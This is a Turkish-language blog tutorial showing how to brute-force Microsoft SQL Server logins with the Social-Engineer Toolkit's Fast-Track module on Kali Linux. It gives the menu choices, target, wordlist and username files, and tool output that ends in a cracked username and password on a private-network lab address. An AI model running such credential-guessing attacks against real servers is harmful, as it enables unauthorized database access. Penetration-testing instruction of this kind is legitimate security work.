Setoolkit ile Mssql Şifresi Bulma

Setoolkit i genellikle phishing sayfaları için mi kullanıyorsunuz , setoolkit ile mssql şifresi bulmaya ne dersiniz? Yine bu işlem için setoolkit in hazır kurulu geldiği kali linux dağıtımını kullanıyorum , setoolkit i açmak ile başlayalım.

root@ayhanarda:/# setoolkit

Karşımıza bir menü gelecek.

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

Mssql şifre denemeleri yapması için 2 numaralı seçenek ile devam ediyoruz ve aşağıdaki menüye ulaşıyoruz.

1) Microsoft SQL Bruter
2) Custom Exploits
3) SCCM Attack Vector
4) Dell DRAC/Chassis Default Checker
5) RID_ENUM – User Enumeration Attack
6) PSEXEC Powershell Injection

99) Return to Main Menu

Yukarıda açılan menüde 1 nolu seçenek ile devam edelim ve aşağıdaki menüye ulaşalım.

1) Scan and Attack MSSQL
2) Connect directly to MSSQL

99) Return to Main Menu

Yukarıdaki menüde 1 nolu seçenek ile devam edelim ve aşağıdaki menüye ulaşalım.

1. Scan IP address or CIDR
2. Import file that contains SQL Server IP addresses

Şimdi yukarıda diyor ki , ben network teki ip adreslerini mi tarayıp sql kurulu sunucu bulayım yoksa sen mi deneme yapmak istediğin sql server ip adresini bir dosyaya yazıp bana söylemek istersin , ben burada 2 nolu seçenek ile devam edeceğim. Mssql server ip adresinin 192.168.1.15 olduğunu varsayalım ve mssql portu 1433 olsun , oluşturacağımız dosya içeriği aşağıdaki gibi olmalı.

root@ayhanarda:~# cat /root/sql.txt
192.168.1.15:1433

Dosyamız hazır ise 2 nolu seçeneği seçtikten sonra aşağıdaki bölüm açılacak ve bizden dosyanın yolunu isteyecek.Örnekteki gibi yazabilirsiniz.

set:fasttrack:mssql:scan> Enter filename for SQL servers (ex. /root/sql.txt – note can be in format of ipaddr:port):/root/sql.txt

Dosya yolunu yazdıktan sonra denemek için bir şifre listemiz olup olmadığını soracaktır , eğer var ise yolunu belirtebilirsiniz , yok ise kendisi içinde tanımlı şifreleri sırası ile deneyecektir , ben daha kolay bulabilmesi için bir sqlsifre.txt dosyası hazırladım ve içine doğru olmayan şifrelerin yanında bir de doğrusunu koydum.

Şifre dosyası yolu belirttikten sonra k.adlarını içeren dosya yolunu soracaktır , yukarıdaki paragrafı tekrar inceleyebilirsiniz , eğer dosya belirtmez iseniz sa kullanıcı adı ile deneyecektir. Bu işlemden sonra enter a bastığınızda hemen çalışmaya başlayacak ve aşağıdaki gibi sonuç üretecektir.

set:fasttrack:mssql:scan> Enter filename for SQL servers (ex. /root/sql.txt – note can be in format of ipaddr:port):/root/sql.txt
set:fasttrack:mssql:scan> Enter path to a wordlist file [use default wordlist]:/root/sqlsifre.txt
set:fasttrack:mssql:scan> Enter the username to brute force or specify username file (/root/users.txt) [sa]:/root/user.lst 
Attempting to brute force  with username of admin and password of password
Attempting to brute force  with username of admin and password of deneme
Attempting to brute force  with username of admin and password of selambensifre
[!] Unable to guess the SQL password for 192.168.1.15 with username of admin
Attempting to brute force  with username of root and password of password
Attempting to brute force  with username of root and password of deneme
Attempting to brute force  with username of root and password of selambensifre
[!] Unable to guess the SQL password for 192.168.1.15 with username of root
Attempting to brute force  with username of selambenkullaniciadi and password of password
Attempting to brute force  with username of selambenkullaniciadi and password of deneme
Attempting to brute force  with username of selambenkullaniciadi and password of selambensifre
[*]
Successful login with username selambenkullaniciadi and password: selambensifre
Attempting to brute force  with username of ayhan_user and password of password
Attempting to brute force  with username of ayhan_user and password of deneme
Attempting to brute force  with username of ayhan_user and password of selambensifre
[!] Unable to guess the SQL password for 192.168.1.15 with username of ayhan_user
[*] Select the compromise SQL server you want to interact with:

1. 192.168.1.15   username: selambenkullaniciadi | password: selambensifre   SQLPort: 1433

99. Return back to the main menu.

Görüldüğü üzere şifre yukarıda belirtilmiştir.

Ayhan ARDA

Share Button

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*